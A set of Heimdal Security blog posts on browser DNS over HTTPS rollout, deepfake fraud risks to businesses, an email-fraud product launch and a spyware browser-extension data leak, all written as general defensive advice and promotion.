How Chrome and Mozilla Are Going to Implement DNS over HTTPS (DoH)

Both Google Chrome and Mozilla have announced that they plan to include DNS over HTTPS by default in future builds.

A. How Chrome will include DNS over HTTPS:

For now, the Chrome team is experimenting with the new DoH protocol only for a limited number of users. This trial period will help them fix any potential issues and figure out how to then deploy DoH for everyone.

The DNS over HTTPS protocol will be tested starting with Chrome 78, which has not been released yet. You can also opt into this experiment if you’d like to be among the users who get DoH in advance.

Once Chrome 78 is live, you can open the Chrome flag chrome://flags/#dns-over-https in order to activate or deactivate the DNS over HTTPS experiment.

The only downside to this is that DoH is still relatively hard to configure manually in Chrome, for inexperienced users at least.

B. How Mozilla will include DNS over HTTPS:

To their credit, Mozilla has been working on DNS over HTTPS implementation for a longer time than Chrome, and it shows. As of now, opting to implement DoH in your browser is easy even for non-technical users, and the protocol settings have a much more developed interface.

For now, it’s an opt-in, as mentioned above, but Mozilla has announced that they plan to make DoH a default in future browser versions as well.

How DNS Traffic Filtering Solutions Need to Adapt to HTTPS

As most organizations are already aware, a DNS traffic filtering solution is a crucial layer of their cybersecurity environment. But while most organizations are already using a DNS traffic filter, the dilemma brought on by DoH is that compatibility issues may arise once browsers start using DoH by default.

In layman’s terms, here’s what can be problematic. DNS traffic filtering solutions use the operating system’s built-in DNS settings in order to perform DNS queries. But if the browser (whether Chrome or Mozilla) no longer uses the standard DNS port (53) for queries and instead switches to the DoH one (443), the traffic filtering solution will lose sight of those queries.

Basically, this has an upside and a downside. On the upside, the built-in DNS over HTTPS protocol from browsers will take over some parts of the functionality held until now by DNS traffic filtering solutions. This is good news for those who did not yet adopt a DNS traffic filter, but they should still be warned that DoH is not enough for security.

On the downside, when the DNS queries from the browser are wrong (or intentionally misled by malicious 3rd parties), the DNS traffic filter might have trouble catching on.

This is why when choosing a DNS traffic filter provider, you need to make sure that they support DNS over HTTPS correctly. Our Thor Foresight Enterprise solution is currently developing a solid integration of DoH.

How to Implement DNS over HTTPS Correctly in Your Organization

Because DNS over HTTPS encrypts DNS traffic for the first time, it can bring more privacy and better security to users and organizations.

But because the DoH protocol is still new, some organizations are anxious about adopting it, due to compatibility and implementation issues. Here’s what you need to know in order to ensure a smooth transition to DNS over HTTPS.

Pros to Early Adoption of DNS over HTTPS (DoH):

  • You get to test out how DoH will integrate with your networks ahead of time and fix any potential issues before the DoH protocol becomes default;
  • If implemented right, you can gain more data security and better privacy across your organization;
  • You get to test out the compatibility of DNS over HTTPS with your DNS traffic filter;
  • Your feedback may help all software parties involved better their products, to your benefit.

Cons to Early Adoption of DNS over HTTPS:

  • If your system admin(s) are not experienced with DoH and similar security protocols, this can end up in blocked queries, false-positive security flags and so on;
  • If your DNS traffic filtering solution has not been integrated with DoH, this can render it ineffective.

How We Cover DoH within Thor Foresight Enterprise

For the moment, our Thor Foresight Enterprise product (which includes DarkLayer Guard, a market-leading DNS traffic filtering solution) circumvents the DNS over HTTPS which will be implemented by browsers.

While we still use the DNS settings from the operating system, we supplement the queries from the browser. Since the DoH protocol is still being tested in browsers, whenever the browser’s DoH resolver falls back, the system proceeds to query the OS settings, which is where our solution comes in.

In the longer run, we are working to fully integrate the DoH protocol with DarkLayer Guard in a way which will help every party involved develop stronger cybersecurity and cyber resilience.

Wrapping up

Like any IT innovation, DNS over HTTPS can pose a few challenges at first, until everyone gets aligned with it. But once DoH becomes the standard, the benefits of it will greatly outweigh the difficulties it poses in the beginning.

The post Enabling DNS over HTTPS (DoH): Advantages and Best Practices appeared first on Heimdal Security Blog.

How Deepfakes Can Ruin Your Business

Worldwide concern is increasing over the adverse effects that deepfakes could have on society, and for good reason. Recently, an employee of a UK-based energy company was tricked into thinking he was talking on the phone with his boss, the CEO of the German parent company, who asked him to transfer $243,000 to a Hungarian supplier. Of course, the employee was not speaking with the actual CEO, but with a scammer who was impersonating the real CEO through voice-altering AI.

This kind of social engineering attack is not new. In fact, merely two months ago, cybersecurity researchers identified three successful deepfake audio attacks on companies. Their “CEO” called a financial officer to ask for an urgent money transfer. The voices of the real CEO had been taken from earnings calls, YouTube videos, TED talks, and other recordings, and inserted into an AI program which enabled fraudsters to imitate the voices.

These types of incidents are the audio version of what are known as deepfake videos, which have been causing global panic for the past couple of years. As we become accustomed to the existence of deepfakes, this may affect our trust in any videos we see or audio footage we hear, including the real ones. Videos, which once used to be the ultimate form of truth that transcended edited pictures that can be easily altered, can now deceive us as well.

And this brings us to the question:

How safe is your business in the face of the deepfake threat?

What are Deepfakes?

Deepfakes are fake video and audio footage of individuals, meant to make them look like they have said and done things which, in fact, they haven’t. “Deep” relates to the “deep learning” technology used to produce the media and “fake” to its artificial nature. Most of the time, the faces of people are superimposed on the bodies of others, or their actual figure is altered in such a way that it appears to be saying and doing something that they never did.

The term was born in 2017 when a Reddit user posted a fake adult video showing the faces of some Hollywood celebrities. Later, the user also published the machine learning code used to create the video.

Can we detect and stop Deepfakes?

Right now, researchers and companies are investigating how they can utilize AI to distinguish and wipe out deepfakes. New advancements have started to rise that are meant to help us identify which pictures and recordings are real and which are fake.

For example, Facebook, Microsoft, the Partnership on AI coalition, and academics from several universities are launching a contest to help improve the detection of deepfakes. They aim to encourage people to produce a technology that can be used by anyone to detect when deepfake material has been created. The Deepfake Detection Challenge will feature a data set and leaderboard, alongside grants and awards, to motivate participants to design new methods of identifying and stopping fake footage meant to deceive others.

Yet, this won’t prevent the fake media from being created, shared, seen and heard by millions of people before it is removed. And without doubt, it can be extremely difficult to face the consequences and repair the damage once malicious materials get distributed.

How can you spot Deepfake videos?

Until some highly reliable technical solutions are designed, we should learn to identify the tell-tale signs of deepfakes. So, here are the flaws you should be looking for:

  • Blinking – Research shows that eye blinking tends to be poorly reproduced in deepfake videos.
  • Head position – Watch out for blurry face borders that subtly blend into the background.
  • Artificially-looking skin – If the face looks extra smooth like it’s been edited, this may be another warning sign. Also, watch out for the skin tone that can be slightly different than the rest of the body.
  • Slow speech and different intonation – Sometimes, you will notice the one who is being impersonated talks rather slowly or there isn’t quite a match between the real person’s voice and the fake one.
  • An overall strange look and feel – In the end, you should trust your instinct. Sometimes, you can simply tell something’s not right.

At the moment, one can easily spot deepfakes. But in the future, as this technology progresses, it will gradually become more difficult.

Deepfakes could destroy everything

Here is what deepfakes could have a highly negative impact on:

#1. Politics

Deepfakes could influence elections since they can put words into politicians’ mouths and make them look like they’ve done or said certain things which, in fact, they haven’t. Deepfake producers could target popular social media channels, where the content shared can instantly become viral.

#2. Justice

Fake evidence for criminal trials could be used against people in court and this way, they could become accused of crimes they did not commit. Thus, the wrong people could go to jail. And on the other hand, people who are guilty could be set free based on false proof.

#3. Stock market

Deepfakes could be used to manipulate stock prices when altered footage of influential people making certain statements gets distributed. Imagine what would happen if a fake video of the CEO of a company such as Apple, Amazon, or Google declaring they’d done something illegal were circulated. For instance, back in 2008, Apple’s stock dropped 10 points based on a false rumor that Steve Jobs had suffered a major heart attack.

#4. Online bullying

The deepfake technology could also be used to amplify cyberbullying, especially since it’s now becoming widely available. People can easily turn into victims when manipulated media of them is posted online. Or they can get blackmailed by cybercriminals who threaten to leak the footage if, for instance, they don’t pay a certain amount of money.

#5. Companies

Someone could be making false statements about your business to destabilize and degrade it. Malicious actors could make it look like you or someone within your organization admits to having been involved in consumer fraud, bribery, sexual abuse, and any other wrongdoing you can think of. Obviously, these kinds of false statements can destroy your company’s reputation and make it difficult for you to prove otherwise.

What can be done?

Due to the current gaps in the law, producers of deepfakes are not held criminally liable. However, the Deepfakes Accountability Act (known in full as the “Defending Each and Every Person from False Appearances by Keeping Exploitation Subject to Accountability Act” – yes, you’ve correctly identified an acronym right there) aims to take measures to criminalize this type of fake media.

In short, anyone who creates deepfakes would be required to reveal that the footage is altered. And if they fail to do so, it will be considered a crime. The existence of these kinds of regulations is mandatory to protect deepfake victims and also the general public from distorted information.

How can you protect your business from Deepfakes?

Your competitors could resort to deepfake blackmail in order to try to eliminate you from the industry.

No matter how good technological deepfake detection solutions become, they won’t prevent manipulated media from being shared and reaching large numbers of people. So, the best way is to teach your employees how to identify fake footage and to question everything that seems suspicious inside the organization.

#1. Train your employees

The topic of deepfakes can be looked at during your cybersecurity training. For instance, if they receive an unexpected call from the CEO who is asking them to transfer $1 million to a bank account, they could, first of all, question if the person on the other line is who they say they are. Maybe, a good countermeasure would be to have a few security questions in place that need to be asked to verify a caller’s identity.

#2. Monitor your brand’s online presence

Your brand’s presence is probably already being monitored online. So, make sure your designated people keep an eye on fake content involving your organization and if anything suspicious is brought to light, they do their best to take it down as soon as possible and mitigate the damage.

This brings us to the next point.

#3. Be transparent

If you become a victim of deepfakes, ensure that your audience is aware of the targeted attack. Trying to ignore what happened or assume that people didn’t believe what they’ve seen or heard won’t make the issue disappear. Therefore, your PR efforts should be centered around communicating that someone from your company has been impersonated and highlighting the artificial nature of the distributed footage.

Never let misinformation erode your public’s confidence!

Wrapping it all up

The dangers of deepfakes are real and should not be underestimated. A single ill-intended rumor could destroy your business. So, you, both as an individual and as an organization, should be prepared to stand against these threats.


The post How Deepfakes Can Ruin Your Business appeared first on Heimdal Security Blog.

Heimdal™ Security Launches MailSentry™, the Solution against Business Email Compromise (BEC)

When cybersecurity advances made hacking a more expensive illegal pursuit, would-be digital thieves switched to social engineering more and more. As long as they could get insiders to trust them, they could make off with company assets in an easier way than fighting the built-in cyber-defenses. That’s why Business Email Compromise (BEC) attacks have risen so much over the past few years.

Almost every month brings yet more news of successful BEC scams. It’s usually public institutions, like city administrations or hospitals, who get targeted by these scams the most. But businesses also make ripe targets for scammers. On average, a successful BEC scam can cost companies around $59,000 per incident, and from July 2016 to July 2019, the total losses caused by BEC scams surpassed $26 billion, according to FBI’s data.

To answer the need for extra defenses against BEC attacks, Heimdal™ Security launches MailSentry™. MailSentry™ is a cybersecurity module designed to identify and prevent email fraud. Beyond the simple protection you can get from a spam filter, this new product will allow businesses everywhere to elude the paralysis of multiple-person approvals and double-checks.

Morten Kjaersgaard, CEO of Heimdal Security, details:

“MailSentry™ will, at last, be able to secure the final frontier of cyberattacks: fraud which relies on human trust. Businesses can now no longer be preyed on by ruthless imposters or waste valuable time in double-checking and questioning every seemingly legitimate request. With our new MailSentry™ product, we expect to lead the market for all mail fraud technologies. From now on, you can prevent CEO fraud and business email compromise in a single blow dealt to hackers.”

How Will MailSentry™ Work?

MailSentry™ is a specialized add-on to any spam filter already in place. It will combine over 125 vectors to detect fraud attempts and flag them properly. By combining email signature scans with word scans in order to detect altered IBAN codes and so on, no suspicious detail will pass unnoticed.

The new MailSentry™ product will be available as part of a personalized Enterprise suite, or as a stand-alone module. With its complex network of vectors, the BEC protection cybersecurity product will automatically detect:

  • Business Email Compromise (BEC)
  • Email-deployed Malware
  • Phishing and Spear Phishing
  • Imposter Threats (Modified Invoices)
  • CEO Fraud and Criminal Impersonation
  • Man-in-the-email and Spoofing Attacks
  • Malicious content in historical emails


With MailSentry™ your business will also receive live monitoring 24/7 by a team specialized in BEC fraud defense. This way, you can detect malicious intent in due time and prevent any costly mistakes.

Raising employee awareness about scams and Business Email Compromise (BEC) is always a good idea, but businesses shouldn’t rely on it. MailSentry™ and its automatic scan vectors will help where human vigilance fails so that scammers won’t stand a chance.

At the same time, its intelligence will be aided by the expertise of the 24/7 specialist team on-call for analyzing suspicious emails. With MailSentry™, you can stand out from your competition by harnessing the capability of innovative technology, coupled with human ingeniousness.

You can read more about MailSentry™ and schedule a free demo HERE.

Note: MailSentry™ will be live and ready to deploy on 31st October 2019.

About Heimdal Security: Heimdal Security is an emerging cybersecurity company, founded in 2014 in Copenhagen by winners of the world ethical hacking competition Defcon CTF. Since then, the company has grown spectacularly, earning awards for both its proactive security suite (Anti-Malware Solution of the Year in 2018) and for its blog, providing intelligence to security outlets worldwide (Most Educational Security Blog in 2016).

The post Heimdal™ Security Launches MailSentry™, the Solution against Business Email Compromise (BEC) appeared first on Heimdal Security Blog.

SECURITY ALERT: Massive Data Leak Revealed the Sensitive Information of Millions of People

The web surfing history of millions of people was intercepted yesterday in a huge data leak. Large Swedish companies, such as Volvo, SAS, Ericsson, Husqvarna, and SKF have been affected, as originally reported by the Swedish newspaper Dagens Nyheter. About 40,000 of the people affected by the cyber incident are allegedly Swedes.

Spyware in Browser Extensions Enabled the Attack

The data spill was caused by spyware code embedded in Chrome and Firefox add-ons, which allowed the browsing history of millions of users to be harvested and sold.

A part of the leaked data comes from some of the largest organizations in Sweden. The database contained information such as discussions between employees, downloaded files, and internal confidential information. More precisely, it was possible to see exactly what people did online and although the information was considered to be anonymous, their identity could be confirmed.

The Failure of a SpaceX Rocket Engine Was Also Leaked

According to security engineer Sam Jadali, other major international companies have been involved as well. For instance, information from the space company SpaceX regarding the failure of a rocket engine was revealed. The vehicle was used to transport astronauts to and from the International Space Station (ISS).

The Company Behind the Data Leak

The information was collected and sold by Nacho Analytics, which is ending its activity now that the leak has been brought to light.

This is the pop-up message that is currently being displayed on their website:

“Nacho Analytics is closing all remaining accounts, and sending refunds to our existing customers for their recent payments. It will take a few days to work through this process. We appreciate your patience. If you are an active customer, please check your email for more detailed information.

Our limited site is active to offer customer support during this transition.”


Browsing habits are a method of studying customer patterns and monitoring competitors. This leak is similar to the one we’ve seen in the Cambridge Analytica scandal, in which Facebook data was abused for political campaigns, writes SVT.

Why Did the Data Leak Happen?

The reason is that many companies use browser-based tools. And if an employee uses a browser extension compromised by spyware, the activity within the tool can also be intercepted by cybercriminals.

Our CEO, Morten Kjaersgaard, has spoken with IT-Kanalen about how serious the problem is.

In his view, the issue seems to be greater than we realize. Specifically, any extension could be used by cybercriminals to access sensitive data. The reason is that these add-ons are not part of a company’s internal system, but developed by third parties. When users install a plugin in a browser, a port opens to the underlying engine – in this case, Chrome or Firefox – where it gets access to data it should not have access to.

On a more positive note, the issue was discovered early, and this way we get the chance to better understand it and find solutions. We should somehow be glad that the attack did not hit IE, which is more commonly used, because this way the damage would probably have been significantly higher, says Morten Kjaersgaard.

How can we reduce the risks?

The simple answer would be to disable all plugins. But since this is rarely a viable solution, here are the recommendations for companies and consumers.

Advice for Companies

Companies should follow several steps. First of all, their IT department should design some form of policy-based system for deciding which add-ons should be installed and also know how they should be handled and monitored. There are existing solutions that are partially already integrated into Chrome.

Secondly, traffic should be monitored in real-time. This way, companies can detect early on whether systems connect and send data to suspicious locations. If this practice is combined with DNS protection and IP filtering, then you will have a great security foundation for your company.

Advice for Consumers

The most obvious recommendation would be not to install any extensions. But if you need to, make sure you install only the few add-ons that you really depend on. What’s more, browser extensions should come from trusted, reputable sources and not from any unknown sites or companies.

By using DNS and IP filtering in combination with traffic monitoring and firewalls, both consumers and companies will play their part in the fight against cybercriminals. And this is something that we must all start with as soon as possible, Morten Kjaersgaard concludes.

Swedish speakers can read the full interview with Morten Kjaersgaard, Heimdal Security’s CEO, here.

Does your company need a cybersecurity solution to prevent Spyware and the most advanced types of malware?

Get in touch today to learn how we can help you.


The post SECURITY ALERT: Massive Data Leak Revealed the Sensitive Information of Millions of People appeared first on Heimdal Security Blog.